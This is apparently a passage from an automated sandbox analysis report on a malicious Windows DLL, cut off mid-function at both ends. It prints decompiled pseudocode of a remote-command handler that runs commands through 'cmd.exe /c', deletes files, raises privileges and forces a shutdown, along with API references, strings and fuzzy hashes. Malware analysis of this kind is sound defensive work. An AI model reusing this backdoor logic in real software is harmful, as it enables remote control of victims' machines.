									_v2088 = _t370;
									if(_t490 <= _t370) {
										L77:
										_push(8);
										_push( &_v1972);
										L6ECAC2EE();
										GetSystemTimeAsFileTime( &_v1980);
										_v2052 = _v1980.dwLowDateTime;
										_v2048 = _v1980.dwHighDateTime;
										_v2092 = _t370;
										RtlTimeToSecondsSince1970( &_v2052,  &_v2092);
										_t395 = M6ECB04CC; // 0xcb2da8
										_t293 = M6ECB04DC; // 0x0
										_v2096 = 0x6467;
										_v2094 = 0;
										_t294 = GetPrivateProfileIntA(_t293,  &_v2096, _t370, _t395);
										if(_t294 != _t370) {
											if(_t294 <= _v2100) {
												E6ECA6A90(_t370, _t370);
												_t501 = _t501 + 8;
											}
										} else {
											_t302 = _v2028;
											_t303 = _t302 & 0x000000ff;
											if(_t302 == 0) {
												_t303 = 1;
											}
											wsprintfA( &_v1372, "%lu", _t303 * 0xe10 + _v2100);
											_t442 = M6ECB04CC; // 0xcb2da8
											_t501 = _t501 + 0xc;
											_t443 = M6ECB04DC; // 0x0
											WritePrivateProfileStringA(_t443,  &_v2088,  &_v1364, _t442);
										}
										goto L83;
									} else {
										if(_t490 >= 0x12) {
											_push(_t370);
											E6ECA53F0(_v2024, _v2028, _v1984, _t490);
											_t476 = _v1984;
											_t501 = _t501 + 0x14;
											if( *_t476 == 0x832eb9b) {
												_t314 = M6ECB04CC; // 0xcb2da8
												_t445 = M6ECB04DC; // 0x0
												_v2088 = 1;
												_v2076 = 0x6467;
												_v2074 = 0;
												WritePrivateProfileStringA(_t445,  &_v2076, _t370, _t314);
												_t316 =  *(_t476 + 4) & 0x0000ffff;
												 *0x6ecb0000 = _t316;
												if(_t316 < 0xa) {
													 *0x6ecb0000 = 0x3c;
												}
												_t317 =  *(_t476 + 0xc) & 0x0000ffff;
												if(_t317 <= _t370) {
													_push(_t370);
													_push(_t370);
													_push(_t370);
													_push(_t370);
												} else {
													_push( *(_t476 + 0xa) & 0x000000ff);
													_t329 = _v1984;
													_push( *(_t476 + 0xb) & 0x000000ff);
													_push(_t317 + _t329 + 0x13);
													_push(_t329 + 0x12);
												}
												E6ECA69C0();
												_t501 = _t501 + 0x10;
												if( *((intOrPtr*)(_t476 + 0x10)) > _t370) {
													_t322 = HeapAlloc(GetProcessHeap(), 8, 0x1c);
													_v0 =  *((intOrPtr*)(_t476 + 6));
													_t477 = E6ECAA360(( *(_t476 + 0xc) & 0x0000ffff) + _v1984 + ( *(_t476 + 0xe) & 0x0000ffff) + 0x14, 1, 0);
													_t324 = E6ECAA2F0(_t477, 0, 0);
													_t501 = _t501 + 0x18;
													_a8 = _t324;
													HeapFree(GetProcessHeap(), 0, _t477);
													CloseHandle(CreateThread(0, 0, E6ECA5B40, _t322, 0, 0));
													Sleep(0x1f4);
													_t370 = 0;
												}
											}
										}
										HeapFree(GetProcessHeap(), _t370, _v1984);
										if(_v2088 != _t370) {
											L83:
											_t295 = _v2088;
											if(_t295 != _t370) {
												_t299 =  *_t295;
												if(_t299 != _t370) {
													SetEvent(_t299);
												}
											}
											_t296 =  *0x6ecb0000; // 0x3c
											_t470 = SetTimer(_t370, _t370, _t296 * 0x3e8, _t370);
											goto L87;
										} else {
											goto L77;
										}
									}
								}
							} else {
								_t493 = 0;
								if(_v2068 <= _t370) {
									goto L54;
								}
								_v2072 = 0xfff - _t473;
								_t478 = _t473 + _t481;
								L42:
								L42:
								if(_t493 > 0) {
									Sleep(0x1f4);
								}
								_t407 =  *0x6ecb0398; // 0x0
								_t373 = GetDlgItemTextA(_t407, 0x4e82, _t478, _v2072);
								if( *_t481 == 0x2d || _t373 < 0xb) {
									goto L46;
								}
								_t494 = 0;
								if(_t373 <= 0) {
									L52:
									_t281 = _t373;
									_v2096 = _t281;
									L53:
									_t473 = _v2092;
									_t370 = 0;
									goto L54;
								} else {
									goto L49;
								}
								do {
									L49:
									if(StrTrimA( &(_t478[_t494]), " ") != 0) {
										_t373 = _t373 - 1;
									}
									_t494 =  &_v3;
								} while (_t494 < _t373);
								goto L52;
								L46:
								_t281 = 0;
								_t493 =  &_v3;
								_v2096 = 0;
								 *_t478 = 0;
								if(_t493 < _v2068) {
									goto L42;
								}
								goto L53;
							}
						}
						_t523 = _t383 - 0x83fe;
						goto L24;
						L89:
						KillTimer(_t370, _t470);
						goto L90;
					}
				}
			}

0x6eca6d56
0x6eca6d60
0x6eca6d66
0x6eca6d67
0x6eca6d78
0x6eca6d81
0x6eca6d85
0x6eca777c
0x6eca7785
0x6eca6d8b
0x6eca6d8b
0x6eca6d94
0x6eca6d95
0x6eca6dab
0x6eca6db9
0x6eca6dbf
0x6eca6dc4
0x6eca6dc9
0x6eca6dd2
0x6eca6dd7
0x6eca6ddc
0x6eca6ddd
0x6eca6de7
0x6eca6deb
0x6eca6def
0x6eca6df3
0x6eca6e05
0x6eca6e0a
0x6eca6e0f
0x6eca6e15
0x6eca6e1b
0x6eca6e24
0x6eca6e26
0x6eca6e2b
0x6eca6e2d
0x6eca6e31
0x6eca6e32
0x6eca6e33
0x6eca6e3b
0x6eca6e3f
0x6eca6e43
0x6eca6e47
0x6eca6e4c
0x6eca6e50
0x6eca6e55
0x6eca6e5f
0x6eca6e63
0x6eca6e67
0x6eca6e69
0x6eca6e6f
0x6eca6e74
0x6eca6e81
0x6eca6e81
0x6eca6e6f
0x6eca6e67
0x6eca6e55
0x6eca6e87
0x6eca6e89
0x6eca6e8a
0x6eca6e8f
0x6eca6e96
0x6eca6e9c
0x6eca6ea0
0x6eca6ea6
0x6eca6ea9
0x6eca6eaf
0x6eca6eb3
0x6eca6eb6
0x6eca6eb9
0x6eca6ebf
0x6eca6ec2
0x6eca6ec8
0x6eca6ecb
0x6eca6ed4
0x6eca6ede
0x6eca6ee2
0x6eca6ee8
0x6eca6eeb
0x6eca6ef0
0x6eca6ef3
0x6eca6efe
0x6eca6f01
0x6eca6f05
0x6eca6f09
0x6eca6f16
0x6eca6f18
0x6eca6f1d
0x6eca6f25
0x6eca6f29
0x6eca6f37
0x6eca6f37
0x6eca6f3d
0x6eca6f4f
0x6eca6f58
0x6eca6f5a
0x6eca6f5f
0x6eca6f67
0x6eca6f6c
0x6eca6f7a
0x6eca6f7a
0x6eca6f93
0x6eca6f97
0x6eca6fa0
0x6eca6fa2
0x6eca6fa7
0x6eca6fb3
0x6eca6fc1
0x6eca6fc1
0x6eca6fce
0x6eca6fd3
0x6eca6fe8
0x6eca6fea
0x6eca6ff2
0x6eca6ffa
0x6eca7002
0x6eca776f
0x6eca7776
0x00000000
0x6eca7008
0x00000000
0x6eca7014
0x6eca7018
0x6eca703a
0x6eca701a
0x6eca701a
0x6eca701f
0x6eca7023
0x6eca702a
0x6eca7031
0x6eca7031
0x6eca7044
0x00000000
0x00000000
0x6eca7059
0x6eca706a
0x6eca773e
0x6eca7746
0x6eca7757
0x6eca775f
0x6eca7010
0x00000000
0x6eca7010
0x00000000
0x6eca7765
0x6eca7077
0x6eca7077
0x00000000
0x00000000
0x6eca707f
0x6eca708b
0x6eca7090
0x6eca709a
0x6eca70ae
0x6eca70af
0x6eca70b2
0x6eca70b3
0x6eca70b6
0x6eca70bb
0x6eca70c0
0x6eca70d5
0x6eca70d9
0x6eca70df
0x6eca70e4
0x6eca710b
0x6eca7121
0x6eca7123
0x6eca7128
0x6eca7131
0x6eca713f
0x6eca713f
0x6eca7128
0x6eca7145
0x6eca7151
0x6eca7155
0x6eca715e
0x6eca7162
0x6eca716c
0x6eca717c
0x6eca717c
0x6eca7191
0x6eca719a
0x6eca719c
0x6eca71a1
0x6eca71b0
0x6eca71be
0x6eca71be
0x6eca71ce
0x6eca71d2
0x6eca71da
0x6eca71e0
0x6eca71ec
0x6eca71f0
0x6eca71f6
0x6eca71fc
0x6eca7212
0x6eca7222
0x6eca7227
0x6eca722b
0x6eca7232
0x6eca723d
0x6eca7246
0x6eca724f
0x6eca7256
0x6eca725d
0x6eca7263
0x6eca726f
0x6eca7270
0x6eca7271
0x6eca7272
0x6eca7279
0x6eca728f
0x6eca7291
0x6eca7296
0x6eca72a2
0x6eca72b0
0x6eca72b0
0x6eca7296
0x6eca72bb
0x6eca72bb
0x6eca725d
0x6eca71fc
0x6eca72c4
0x6eca72c6
0x6eca72ca
0x6eca72ce
0x6eca72d2
0x6eca72d8
0x6eca7367
0x6eca7367
0x6eca736b
0x6eca7376
0x6eca7378
0x6eca7386
0x6eca7390
0x6eca7396
0x6eca739c
0x6eca73a3
0x6eca73a5
0x6eca73a9
0x6eca73ac
0x6eca73ac
0x6eca739c
0x6eca73bb
0x6eca73bf
0x6eca73c6
0x6eca73ca
0x6eca73ce
0x6eca73d2
0x6eca73d6
0x6eca73d9
0x6eca73dc
0x6eca7412
0x6eca7412
0x6eca7416
0x00000000
0x6eca73de
0x6eca73de
0x6eca73e7
0x00000000
0x00000000
0x6eca73ec
0x6eca73f2
0x6eca73f8
0x6eca73ff
0x6eca7409
0x6eca740d
0x6eca7419
0x6eca741d
0x6eca7422
0x6eca7423
0x6eca7427
0x6eca7434
0x6eca743b
0x6eca743f
0x6eca7441
0x6eca7448
0x6eca7450
0x6eca7453
0x6eca7461
0x6eca7466
0x6eca746d
0x6eca7470
0x6eca7474
0x6eca747a
0x6eca7487
0x6eca7491
0x6eca7496
0x6eca7496
0x6eca749d
0x6eca74a2
0x6eca74a3
0x6eca74ac
0x6eca74ae
0x6eca74b7
0x6eca74bc
0x6eca74c6
0x6eca74d3
0x6eca74d3
0x6eca74d9
0x6eca74df
0x6eca763f
0x6eca763f
0x6eca7648
0x6eca7649
0x6eca7656
0x6eca766e
0x6eca7678
0x6eca767c
0x6eca7680
0x6eca7685
0x6eca768b
0x6eca7698
0x6eca769f
0x6eca76a4
0x6eca76ac
0x6eca7706
0x6eca770a
0x6eca770f
0x6eca770f
0x6eca76ae
0x6eca76ae
0x6eca76b4
0x6eca76b7
0x6eca76b9
0x6eca76b9
0x6eca76d6
0x6eca76dc
0x6eca76e2
0x6eca76e6
0x6eca76fa
0x6eca76fa
0x00000000
0x6eca74e5
0x6eca74e8
0x6eca74fd
0x6eca7502
0x6eca7507
0x6eca750e
0x6eca7517
0x6eca751d
0x6eca7522
0x6eca7530
0x6eca7538
0x6eca753f
0x6eca7544
0x6eca754a
0x6eca754e
0x6eca7556
0x6eca7558
0x6eca7558
0x6eca7562
0x6eca7569
0x6eca7589
0x6eca758a
0x6eca758b
0x6eca758c
0x6eca756b
0x6eca7573
0x6eca7576
0x6eca757d
0x6eca7582
0x6eca7586
0x6eca7586
0x6eca758d
0x6eca7592
0x6eca7599
0x6eca75bd
0x6eca75cd
0x6eca75d7
0x6eca75dc
0x6eca75e1
0x6eca75e7
0x6eca75f1
0x6eca760c
0x6eca7617
0x6eca761d
0x6eca761d
0x6eca7599
0x6eca7517
0x6eca762f
0x6eca7639
0x6eca7712
0x6eca7712
0x6eca7718
0x6eca771a
0x6eca771e
0x6eca7721
0x6eca7721
0x6eca771e
0x6eca7727
0x6eca773c
0x00000000
0x00000000
0x00000000
0x00000000
0x6eca7639
0x6eca74df
0x6eca72de
0x6eca72de
0x6eca72e4
0x00000000
0x00000000
0x6eca72f1
0x6eca72f5
0x00000000
0x6eca72f7
0x6eca72f9
0x6eca7300
0x6eca7300
0x6eca730a
0x6eca7321
0x6eca7323
0x00000000
0x00000000
0x6eca733c
0x6eca7340
0x6eca735b
0x6eca735b
0x6eca735d
0x6eca7361
0x6eca7361
0x6eca7365
0x00000000
0x00000000
0x00000000
0x00000000
0x6eca7342
0x6eca7342
0x6eca7353
0x6eca7355
0x6eca7355
0x6eca7356
0x6eca7357
0x00000000
0x6eca732a
0x6eca732a
0x6eca732c
0x6eca732d
0x6eca7331
0x6eca7338
0x00000000
0x00000000
0x00000000
0x6eca733a
0x6eca72d8
0x6eca705b
0x00000000
0x6eca7767
0x6eca7769
0x00000000
0x6eca7769
0x6eca7002

APIs

RtlZeroMemory.NTDLL(?,00000014), ref: 6ECA6D67
VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004,?,00000014), ref: 6ECA6D7B
RtlZeroMemory.NTDLL(?,00000014), ref: 6ECA6D95
GetLocaleInfoW.KERNEL32(00000400,0000005A,?,00000009,?,00000014), ref: 6ECA6DAB
CharLowerW.USER32(?), ref: 6ECA6DB9
RtlZeroMemory.NTDLL(6ECB03A0,0000009C), ref: 6ECA6DC9
RtlGetNtVersionNumbers.NTDLL ref: 6ECA6DF3
RtlZeroMemory.NTDLL(00000000,00000034), ref: 6ECA6E8A
RtlMoveMemory.NTDLL(00000034,00000000,?), ref: 6ECA6F29
GetProcessHeap.KERNEL32(00000000,00000000,00000034,00000000,?), ref: 6ECA6F30
HeapFree.KERNEL32(00000000), ref: 6ECA6F37
RtlMoveMemory.NTDLL(00000035,00000000,?), ref: 6ECA6F6C
GetProcessHeap.KERNEL32(00000000,00000000,00000035,00000000,?), ref: 6ECA6F73
HeapFree.KERNEL32(00000000), ref: 6ECA6F7A
RtlMoveMemory.NTDLL(?,00000000,?), ref: 6ECA6FB3
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?), ref: 6ECA6FBA
HeapFree.KERNEL32(00000000,?,00000000,?), ref: 6ECA6FC1

Part of subcall function 6ECA1DB0: lstrlenA.KERNEL32(?,?,00000000,?,?,?,?,6ECA9D7B), ref: 6ECA1E3E
Part of subcall function 6ECA1DB0: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 6ECA1E48

SetTimer.USER32 ref: 6ECA6FD7
GetMessageA.USER32 ref: 6ECA6FFA
KillTimer.USER32(00000000,00000000), ref: 6ECA707F
RtlZeroMemory.NTDLL(00000000,00001000), ref: 6ECA70B6
wsprintfW.USER32 ref: 6ECA70D9
GetPrivateProfileStringW.KERNEL32(PWD,?,00000000,?,00000103,00CC4128), ref: 6ECA7103
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 6ECA7131
GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 6ECA7138
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6ECA713F

Strings

%s\%s, xrefs: 6ECA70CF
gd, xrefs: 6ECA7698
PWD, xrefs: 6ECA70FE
(, xrefs: 6ECA6FEA
gd, xrefs: 6ECA7538
%lu, xrefs: 6ECA76D0

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Memory$Heap$Zero$FreeMoveProcess$Timer$AllocCharComputeCrc32InfoKillLocaleLowerMessageNumbersPrivateProfileStringVersionVirtuallstrlenwsprintf
String ID: %lu$%s\%s$($PWD$gd$gd
API String ID: 2388189746-3190195910
Opcode ID: 70cbdd18ef85b8314e504df6862a5c51a1f6d5d782fbcf571a2afbd34bafa655
Instruction ID: 9df3c749639cf5fcd04f4f0adb3848239d14b8871e186853e825ec8e81aaef2b
Opcode Fuzzy Hash: 70cbdd18ef85b8314e504df6862a5c51a1f6d5d782fbcf571a2afbd34bafa655
Instruction Fuzzy Hash: 215271B1508742AFD720DFA8C984EABBBF9FB89704F00891DF68587245E774D944CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA5B40, Relevance: 104.0, APIs: 48, Strings: 11, Instructions: 721
memorysleepstringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E6ECA5B40() {
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t91;
				void* _t95;
				char _t106;
				char _t109;
				int _t115;
				char* _t133;
				int _t150;
				WCHAR* _t152;
				int _t153;
				int _t154;
				int _t155;
				char* _t156;
				long _t159;
				char* _t163;
				int _t168;
				int _t169;
				long _t174;
				long _t177;
				int _t180;
				int _t185;
				int _t193;
				struct HWND__* _t197;
				intOrPtr* _t202;
				int _t203;
				int _t204;
				char* _t206;
				void* _t209;
				void* _t213;
				CHAR* _t227;
				struct HWND__* _t232;
				intOrPtr _t233;
				int _t234;
				char _t238;
				CHAR* _t256;
				CHAR* _t257;
				struct HWND__* _t258;
				intOrPtr _t259;
				long _t262;
				long _t264;
				int _t265;
				signed int _t271;
				int _t276;
				int _t279;
				void* _t280;
				int _t281;
				void* _t282;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t291;
				void* _t298;
				void* _t299;

				_t209 =  *(_t282 + 0x130);
				 *(_t282 + 0x1c) = 0;
				_t280 = E6ECAA3D0( *(_t209 + 0xc), _t282 + 0x14);
				_t283 = _t282 + 8;
				 *(_t283 + 0x10) = _t280;
				if(_t280 == 0) {
					L133:
					_t91 =  *_t209;
					if(_t91 != 0) {
						WaitForSingleObject(_t91, 0xffffffff);
						CloseHandle( *_t209);
					}
					HeapFree(GetProcessHeap(), 0,  *(_t209 + 0xc));
					_t95 =  *(_t209 + 0x14);
					if(_t95 != 0) {
						HeapFree(GetProcessHeap(), 0, _t95);
					}
					HeapFree(GetProcessHeap(), 0, _t209);
					return 0;
				}
				if( *((intOrPtr*)(_t283 + 0x14)) <= 0) {
					L132:
					LocalFree(_t280);
					goto L133;
				}
				CharLowerA( *_t280);
				_t106 =  *( *_t280);
				if(_t106 < 0x61 || _t106 > 0x7a) {
					if(_t106 != 0x21) {
						E6ECA5AF0(_t209, 4, 0, 0);
						goto L132;
					}
					goto L5;
				} else {
					L5:
					_t109 = HeapAlloc(GetProcessHeap(), 8, 0x400);
					 *(_t283 + 0x18) = _t109;
					if(_t109 == 0) {
						goto L132;
					}
					_t262 = lstrlenA( *_t280);
					_t271 = RtlComputeCrc32(0,  *_t280, _t262) ^ 0x00435a88;
					_t298 = _t271 - 0x539b9257;
					if(_t298 > 0) {
						__eflags = _t271 - 0xcd8eabe7;
						if(__eflags > 0) {
							__eflags = _t271 - 0xe7ba788f;
							if(__eflags > 0) {
								__eflags = _t271 - 0xf06cffa0;
								if(_t271 == 0xf06cffa0) {
									L13:
									if( *((intOrPtr*)(_t283 + 0x14)) >= 2) {
										wsprintfA( *(_t283 + 0x18), "/c %s",  *(_t209 + 0xc) + _t262 + 1);
										_t285 = _t283 + 0xc;
										__eflags = _t271 - 0x876bcf36;
										if(_t271 == 0x876bcf36) {
											L124:
											_t213 = 0x384;
											L125:
											__eflags = _t271 - 0x2f1f4648;
											if(_t271 == 0x2f1f4648) {
												L128:
												_t115 = 0;
												__eflags = 0;
												L129:
												_push(0);
												_push(_t213);
												_push(_t115);
												E6ECA5AF0(_t209, E6ECA4230(0, "cmd.exe",  *((intOrPtr*)(_t285 + 0x24))), 0, 0);
												_t283 = _t285 + 0x28;
												goto L130;
											}
											__eflags = _t271 - 0x876bcf36;
											if(_t271 == 0x876bcf36) {
												goto L128;
											}
											_t115 = 1;
											goto L129;
										}
										__eflags = _t271 - 0x4779d712;
										if(_t271 == 0x4779d712) {
											goto L124;
										}
										__eflags = _t271 - 0x2965d6c5;
										if(_t271 == 0x2965d6c5) {
											goto L124;
										}
										_t213 = 0;
										goto L125;
									} else {
										E6ECA5AF0(_t209, 2, 0, 0);
										_t283 = _t283 + 0x10;
										L130:
										HeapFree(GetProcessHeap(), 0,  *(_t283 + 0x18));
										goto L132;
									}
								}
								__eflags = _t271 - 0xf4d35c00;
								if(_t271 == 0xf4d35c00) {
									_push(0);
									_push(0);
									_push(0x65);
									L84:
									_push(E6ECA5190());
									_push(_t209);
									E6ECA5AF0();
									_t283 = _t283 + 0x14;
									goto L130;
								}
								__eflags = _t271 - 0xf7013bb9;
								if(_t271 == 0xf7013bb9) {
									__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 2;
									if( *((intOrPtr*)(_t283 + 0x14)) >= 2) {
										_t238 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
										wsprintfA( *(_t283 + 0x18), "\"%s%s\" /c %s", _t238, "cmd.exe",  *(_t209 + 0xc) + _t262 + 1);
										_push(_t283 + 0x24);
										_push(0x384);
										 *(_t283 + 0x30) = 0;
										__eflags = E6ECA2ED0( *(_t283 + 0x18));
										E6ECA5AF0(_t209, 0 | E6ECA2ED0( *(_t283 + 0x18)) != 0x00000000, _t127,  *(_t283 + 0x30));
										_t283 = _t283 + 0x30;
										goto L130;
									}
									L117:
									E6ECA5AF0(_t209, 2, 0, 0);
									_t283 = _t283 + 0x10;
									goto L130;
								}
								L115:
								E6ECA5AF0(_t209, 4, 0, 0);
								_t283 = _t283 + 0x10;
								goto L130;
							}
							if(__eflags == 0) {
								L107:
								__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 1;
								if( *((intOrPtr*)(_t283 + 0x14)) <= 1) {
									L111:
									E6ECA5060(5, 0, 0);
									_t283 = _t283 + 0xc;
									goto L130;
								}
								_t133 =  *((intOrPtr*)(_t280 + 4));
								__eflags =  *_t133 - 0x67;
								if( *_t133 != 0x67) {
									goto L111;
								}
								__eflags =  *((char*)(_t133 + 1));
								if( *((char*)(_t133 + 1)) != 0) {
									goto L111;
								}
								E6ECA5060(5, 1, 0);
								_t283 = _t283 + 0xc;
								goto L130;
							}
							__eflags = _t271 - 0xd4c57ba8;
							if(_t271 == 0xd4c57ba8) {
								__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 2;
								_push(".pdll");
								if( *((intOrPtr*)(_t283 + 0x14)) >= 2) {
									_push( *((intOrPtr*)(_t280 + 4)));
									_push("     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD");
									wsprintfA(_t283 + 0x3c, "%s%s%s");
									_t287 = _t283 + 0x14;
									E6ECA5AF0(_t209, DeleteFileA(_t287 + 0x30), 0, 0);
									_t283 = _t287 + 0x10;
								} else {
									_push("     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD");
									E6ECA5AF0(_t209, E6ECA2DF0(), 0, 0);
									_t283 = _t283 + 0x18;
								}
								goto L130;
							}
							__eflags = _t271 - 0xdf32d24a;
							if(_t271 == 0xdf32d24a) {
								__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 2;
								if( *((intOrPtr*)(_t283 + 0x14)) >= 2) {
									wsprintfA(_t283 + 0x3c, "%s%s%s", "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD",  *((intOrPtr*)(_t280 + 4)), ".pdll");
									E6ECA5AF0(_t209, E6ECA2750(_t283 + 0x44), 0, 0);
									_t283 = _t283 + 0x28;
								} else {
									_push(0);
									E6ECA28B0(".pdll");
									E6ECA5AF0(_t209, 1, 0, 0);
									_t283 = _t283 + 0x18;
								}
								goto L130;
							}
							__eflags = _t271 - 0xe6f1017f;
							if(_t271 != 0xe6f1017f) {
								goto L115;
							}
							L90:
							_t150 = OpenProcessToken(0xffffffff, 0x28, _t283 + 0x10);
							__eflags = _t150;
							if(_t150 == 0) {
								L98:
								E6ECA5AF0(_t209, 0, 0, 0);
								_t283 = _t283 + 0x10;
								goto L130;
							}
							_t152 = M6ECB0568; // 0x0
							_t153 = LookupPrivilegeValueW(0, _t152, _t283 + 0x24);
							__eflags = _t153;
							if(_t153 == 0) {
								goto L98;
							}
							 *(_t283 + 0x38) = 1;
							 *((intOrPtr*)(_t283 + 0x44)) = 2;
							_t154 = AdjustTokenPrivileges( *(_t283 + 0x10), 0, _t283 + 0x2c, 0, 0, 0);
							__eflags = _t154;
							if(_t154 == 0) {
								goto L98;
							}
							asm("sbb esi, esi");
							_t276 = ( ~(_t271 - 0xc110de04) & 0x00000006) + 2;
							__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 1;
							if( *((intOrPtr*)(_t283 + 0x14)) > 1) {
								_t156 =  *((intOrPtr*)(_t280 + 4));
								__eflags =  *_t156 - 0x66;
								if( *_t156 == 0x66) {
									__eflags =  *((char*)(_t156 + 1));
									if( *((char*)(_t156 + 1)) == 0) {
										_t276 = _t276 | 0x00000014;
										__eflags = _t276;
									}
								}
							}
							_t155 = ExitWindowsEx(_t276, 0);
							__eflags = _t155;
							if(_t155 != 0) {
								goto L130;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_push(0);
							_push(0);
							_push(0x66);
							goto L84;
						}
						__eflags = _t271 - 0xb3beafae;
						if(__eflags > 0) {
							__eflags = _t271 - 0xb9154c3e;
							if(_t271 == 0xb9154c3e) {
								E6ECA5060(5, 0, 1);
								_t283 = _t283 + 0xc;
								goto L130;
							}
							__eflags = _t271 - 0xc110de04;
							if(_t271 == 0xc110de04) {
								goto L90;
							}
							__eflags = _t271 - 0xc52dedf4;
							if(_t271 != 0xc52dedf4) {
								goto L115;
							}
							_push(0);
							_push(0);
							_push(0x75);
							goto L84;
						}
						if(__eflags == 0) {
							L57:
							__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 3;
							if( *((intOrPtr*)(_t283 + 0x14)) >= 3) {
								_t281 = 0;
								 *(_t283 + 0x30) = 0;
